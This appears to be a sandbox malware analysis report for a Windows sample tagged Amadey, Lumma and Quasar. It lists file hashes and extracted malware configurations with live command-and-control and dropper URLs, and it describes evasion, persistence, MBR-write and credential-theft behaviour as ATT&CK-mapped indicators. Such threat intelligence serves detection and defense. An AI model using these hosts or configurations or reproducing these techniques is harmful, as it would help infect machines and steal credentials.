amadey | c8e1a3b7374bb21b906a034c52c5fd9350fa87e822956e3f8ad37bfdb5d9cb86

Analysis

max time kernel
138s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
30/03/2025, 14:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

fbd874278e3584ab6be6a8c49bd7ba9d
SHA1

2a83fce3a5f6da55d0cb7353e5a98aaac2c7fdc2
SHA256

c8e1a3b7374bb21b906a034c52c5fd9350fa87e822956e3f8ad37bfdb5d9cb86
SHA512

d7e66c87b6e871ccfe844f051ef9a0289849602fc759ba3b251ebf891000a1db282d9a7f2d3c9c328da9ed99fc85a593fe3933aa76cd7e0e8c98394d9868d1eb
SSDEEP

24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:7TvC/MTQYxsWR7a0J

Score

10^/10

amadey lumma quasar 092155 office04 bootkit defense_evasion discovery execution exploit persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Extracted

Family

lumma

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://apixtreev.run/LkaUz

https://tsparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://cosmosyf.top/GOsznj

https://pixtreev.run/LkaUz

https://sparkiob.digital/KeASUp

https://esccapewz.run/ANSbwqy

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/memory/5408-175-0x000000000C4A0000-0x000000000C5F4000-memory.dmp	family_quasar
behavioral2/memory/5408-177-0x000000000C5F0000-0x000000000C60A000-memory.dmp	family_quasar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	149b288636.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dd83afce66.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2f5c500416.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	80971a3226.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 6 IoCs

flow	pid	Process
20	2944	powershell.exe
47	5408	powershell.exe
107	5408	powershell.exe
142	5408	powershell.exe
269	5408	powershell.exe
355	5408	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5784	PowerShell.exe
4676	powershell.exe
224	powershell.exe
8108	powershell.exe
2944	powershell.exe
5408	powershell.exe
4860	powershell.exe
6080	powershell.exe
4340	powershell.exe
2548	powershell.exe
6656	powershell.exe
8400	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 16 IoCs

flow	pid	Process
172	2624	futors.exe
130	2624	futors.exe
138	5992	rapes.exe
156	5992	rapes.exe
254	2624	futors.exe
32	5992	rapes.exe
32	5992	rapes.exe
32	5992	rapes.exe
72	5992	rapes.exe
87	2624	futors.exe
136	5052	svchost.exe
20	2944	powershell.exe
104	2624	futors.exe
132	5992	rapes.exe
133	2624	futors.exe
113	5992	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\b296ad91.sys	07797712.exe
File created	C:\Windows\System32\Drivers\klupd_b296ad91a_arkmon.sys	07797712.exe
File created	C:\Windows\System32\Drivers\klupd_b296ad91a_klbg.sys	07797712.exe

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
1552	takeown.exe
2440	icacls.exe
1372	takeown.exe
1252	icacls.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_mark\ImagePath = "System32\\Drivers\\klupd_b296ad91a_mark.sys"	07797712.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b296ad91a_arkmon.sys"	07797712.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\vtxCfG_1424\ImagePath = "\\??\\C:\\Windows\\Temp\\kYkKeng_1424.sys"	tzutil.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b296ad91\ImagePath = "System32\\Drivers\\b296ad91.sys"	07797712.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_arkmon\ImagePath = "System32\\Drivers\\klupd_b296ad91a_arkmon.sys"	07797712.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_klbg\ImagePath = "System32\\Drivers\\klupd_b296ad91a_klbg.sys"	07797712.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_klark\ImagePath = "System32\\Drivers\\klupd_b296ad91a_klark.sys"	07797712.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	80971a3226.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	149b288636.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dd83afce66.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	80971a3226.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dd83afce66.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2f5c500416.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	149b288636.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2f5c500416.exe

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	Bell_Setup16.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	25e0e44750.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	mshta.exe

Deletes itself 1 IoCs

pid	Process
4028	w32tm.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_13dbf360.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_13dbf360.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5ee13fa1.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5ee13fa1.cmd	powershell.exe

Executes dropped EXE 37 IoCs

pid	Process
3248	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
5992	rapes.exe
4072	Rm3cVPI.exe
2664	149b288636.exe
844	rapes.exe
220	25e0e44750.exe
2624	221.exe
5912	221.exe
4392	kO2IdCz.exe
3248	apple.exe
2928	221.exe
5968	221.exe
1564	amnew.exe
2624	futors.exe
2944	dd83afce66.exe
5776	gron12321.exe
3972	69ef18966e.exe
2104	v7942.exe
3136	2f5c500416.exe
4024	alex1dskfmdsf.exe
5036	EPTwCQd.exe
3508	80971a3226.exe
776	Bell_Setup16.exe
2816	Bell_Setup16.tmp
3712	Bell_Setup16.exe
1424	Bell_Setup16.tmp
5420	u75a1_003.exe
5572	7IIl2eE.exe
1424	tzutil.exe
4028	w32tm.exe
13252	rapes.exe
13204	bot.exe
13304	futors.exe
6604	bot.exe
7780	Rm3cVPI.exe
9176	389f4e0c.exe
10124	07797712.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	2f5c500416.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	80971a3226.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	149b288636.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	dd83afce66.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b296ad91.sys	07797712.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b296ad91.sys\ = "Driver"	07797712.exe

Loads dropped DLL 27 IoCs

pid	Process
1272	regsvr32.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
10124	07797712.exe
8072	regsvr32.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2440	icacls.exe
1372	takeown.exe
1252	icacls.exe
1552	takeown.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	kO2IdCz.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\c11cba54-f45d-4da0-9170-b7d29a6abc58 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{05153dd9-b861-4ac2-830e-07f05cd13009}\\c11cba54-f45d-4da0-9170-b7d29a6abc58.cmd\""	07797712.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	07797712.exe

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	07797712.exe
File opened for modification	\??\PHYSICALDRIVE0	149b288636.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
3248	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
5992	rapes.exe
2664	149b288636.exe
844	rapes.exe
2944	dd83afce66.exe
3136	2f5c500416.exe
3508	80971a3226.exe
13252	rapes.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 5776 set thread context of 1044	5776	gron12321.exe	273
PID 3972 set thread context of 5948	3972	69ef18966e.exe	276
PID 4024 set thread context of 5424	4024	alex1dskfmdsf.exe	285
PID 5036 set thread context of 4920	5036	EPTwCQd.exe	287

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	389f4e0c.exe
File opened (read-only)	\??\VBoxMiniRdrDN	07797712.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3144	sc.exe
4332	sc.exe
5472	sc.exe
5484	sc.exe
3216	sc.exe
2892	sc.exe
2140	sc.exe
1976	sc.exe
4860	sc.exe
5716	sc.exe
2096	sc.exe
2036	sc.exe
1244	sc.exe
1044	sc.exe
5940	sc.exe
3476	sc.exe
4588	sc.exe
4352	sc.exe
6052	sc.exe
5880	sc.exe
3476	sc.exe
5308	sc.exe
1560	sc.exe
1260	sc.exe
2364	sc.exe
3928	sc.exe
4560	sc.exe
1020	sc.exe
5032	sc.exe
4920	sc.exe
5036	sc.exe
5736	sc.exe
3104	sc.exe
5500	sc.exe
756	sc.exe
3096	sc.exe
1636	sc.exe
1596	sc.exe
4480	sc.exe
4604	sc.exe
2360	sc.exe
5716	sc.exe
3576	sc.exe
4024	sc.exe
1424	sc.exe
2896	sc.exe
2336	sc.exe
3712	sc.exe
1280	sc.exe
5824	sc.exe
4336	sc.exe
4756	sc.exe
1160	sc.exe
4576	sc.exe
5968	sc.exe
2608	sc.exe
4080	sc.exe
5344	sc.exe
4416	sc.exe
4068	sc.exe
5092	sc.exe
700	sc.exe
1192	sc.exe
1568	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	07797712.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	07797712.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3368	3508	WerFault.exe	288

System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowerShell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	07797712.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dd83afce66.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE
